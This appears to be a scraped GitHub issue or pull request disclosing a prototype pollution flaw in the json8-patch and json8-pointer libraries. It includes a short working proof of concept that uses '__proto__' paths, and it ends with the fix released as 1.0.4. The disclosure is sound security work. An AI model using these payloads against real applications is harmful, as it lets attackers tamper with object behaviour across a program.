Closed luci-m-666 closed 3 years ago
json8-patch and json8-pointer is vulnerable to prototype pollution. POC json8-patch
json8-patch
json8-pointer
var json8Patch = require("json8-patch") var obj = {} const patch = [{op: "add", path: "/__proto__/polluted", value: "Yes! Its Polluted"}]; console.log("Before : " + obj.polluted); json8Patch.apply(obj, patch); console.log("After : " + {}.polluted);
var json8Pointer = require("json8-pointer") json8Pointer.unflatten({"": {},"/firstName": "John", "/__proto__/polluted": "Yes! Its Polluted"}); console.log({}.polluted)
OUTPUT
Before : undefined After : Yes! Its Polluted
With this fix prototype pollution can be avoided.
Thank you.
Made some changes and added tests.
released and published as 1.0.4
json8-patch
andjson8-pointer
is vulnerable to prototype pollution. POCjson8-patch
json8-pointer
OUTPUT
With this fix prototype pollution can be avoided.